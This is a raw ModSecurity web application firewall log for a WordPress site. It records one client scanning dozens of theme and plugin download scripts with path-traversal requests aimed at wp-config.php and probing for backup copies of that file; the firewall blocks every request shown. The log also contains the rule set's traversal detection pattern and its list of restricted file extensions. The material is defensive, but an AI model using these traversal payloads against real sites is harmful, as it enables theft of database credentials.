[data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SCv1/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SCv1/download.php"] [unique_id "ZN-wdFxvK4MFoveIP9_KvAAAAIQ"] [Fri Aug 18 12:55:00.720047 2023] [:error] [pid 18872:tid 140103250806528] [client 87.249.132.213:35482] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adminonline/product/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adminonline/product/download.php"] [unique_id "ZN-wdPG_rKmCSnA6LxD5kgAAABU"] [Fri Aug 18 12:55:00.814890 2023] [:error] [pid 18873:tid 140103457580800] [client 87.249.132.213:35484] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZN-wdLCcrCl0jrDdhfxXUgAAAEU"] [Fri Aug 18 12:55:00.909098 2023] [:error] [pid 18874:tid 140103259199232] [client 87.249.132.213:35486] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/eshop-magic/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/eshop-magic/download.php"] [unique_id "ZN-wdFxvK4MFoveIP9_KvQAAAJQ"] [Fri Aug 18 12:55:01.004333 2023] [:error] [pid 18873:tid 140103465973504] [client 87.249.132.213:35488] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ZN-wdbCcrCl0jrDdhfxXUwAAAEQ"] [Fri Aug 18 12:55:01.111569 2023] [:error] [pid 18872:tid 140103482758912] [client 87.249.132.213:35490] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "ZN-wdfG_rKmCSnA6LxD5kwAAAAI"] [Fri Aug 18 12:55:01.209595 2023] [:error] [pid 18874:tid 140103317948160] [client 87.249.132.213:35492] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/nishizawa_tmp/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/nishizawa_tmp/force-download.php"] [unique_id "ZN-wdVxvK4MFoveIP9_KvgAAAI0"] [Fri Aug 18 12:55:01.304054 2023] [:error] [pid 18872:tid 140103499544320] [client 87.249.132.213:35494] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "ZN-wdfG_rKmCSnA6LxD5lAAAAAA"] [Fri Aug 18 12:55:01.411162 2023] [:error] [pid 19445:tid 140103259199232] [client 87.249.132.213:35496] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/liberator/inc/php/download.php?download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/liberator/inc/php/download.php"] [unique_id "ZN-wdUWc94tsnIsHAQ-XugAAANQ"] [Fri Aug 18 12:55:01.506231 2023] [:error] [pid 18873:tid 140103225628416] [client 87.249.132.213:35498] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/FR0_theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/FR0_theme/down.php"] [unique_id "ZN-wdbCcrCl0jrDdhfxXVAAAAFg"] [Fri Aug 18 12:55:01.601328 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:35500] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "ZN-wdUWc94tsnIsHAQ-XuwAAAMM"] [Fri Aug 18 12:55:01.696248 2023] [:error] [pid 19445:tid 140103499544320] [client 87.249.132.213:35502] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/clinell/include/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/clinell/include/download.php"] [unique_id "ZN-wdUWc94tsnIsHAQ-XvAAAAMA"] [Fri Aug 18 12:55:01.790818 2023] [:error] [pid 18874:tid 140103267591936] [client 87.249.132.213:35504] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "ZN-wdVxvK4MFoveIP9_KvwAAAJM"] [Fri Aug 18 12:55:01.906837 2023] [:error] [pid 19445:tid 140103292770048] [client 87.249.132.213:35506] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZN-wdUWc94tsnIsHAQ-XvQAAANA"] [Fri Aug 18 12:55:02.002377 2023] [:error] [pid 18874:tid 140103351518976] [client 87.249.132.213:35508] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZN-wdlxvK4MFoveIP9_KwAAAAIk"] [Fri Aug 18 12:55:18.619121 2023] [:error] [pid 18874:tid 140103250806528] [client 87.249.132.213:35558] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZN-whlxvK4MFoveIP9_KxwAAAJU"] [Fri Aug 18 12:55:18.736239 2023] [:error] [pid 19445:tid 140103491151616] [client 87.249.132.213:35560] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZN-whkWc94tsnIsHAQ-XxAAAAME"] [Fri Aug 18 12:55:22.163372 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:35572] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZN-wikWc94tsnIsHAQ-XxwAAAMQ"] [Fri Aug 18 12:55:46.534984 2023] [:error] [pid 18874:tid 140103457580800] [client 87.249.132.213:35650] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.bak"] [unique_id "ZN-wolxvK4MFoveIP9_K2gAAAIU"] [Fri Aug 18 12:55:53.492371 2023] [:error] [pid 18874:tid 140103250806528] [client 87.249.132.213:35676] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.old"] [unique_id "ZN-wqVxvK4MFoveIP9_K3wAAAJU"] [Fri Aug 18 12:56:16.158227 2023] [:error] [pid 18874:tid 140103284377344] [client 87.249.132.213:35754] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.bak"] [unique_id "ZN-wwFxvK4MFoveIP9_K6AAAAJE"] [Fri Aug 18 12:56:23.513040 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:35772] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.old"] [unique_id "ZN-wx0Wc94tsnIsHAQ-X8wAAAMk"] [Fri Aug 18 12:57:18.653251 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:35950] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-license.php?file=..%2F..%2F%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-license.php"] [unique_id "ZN-w_kWc94tsnIsHAQ-YFwAAAMU"] [Fri Aug 18 12:57:29.175246 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35982] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ 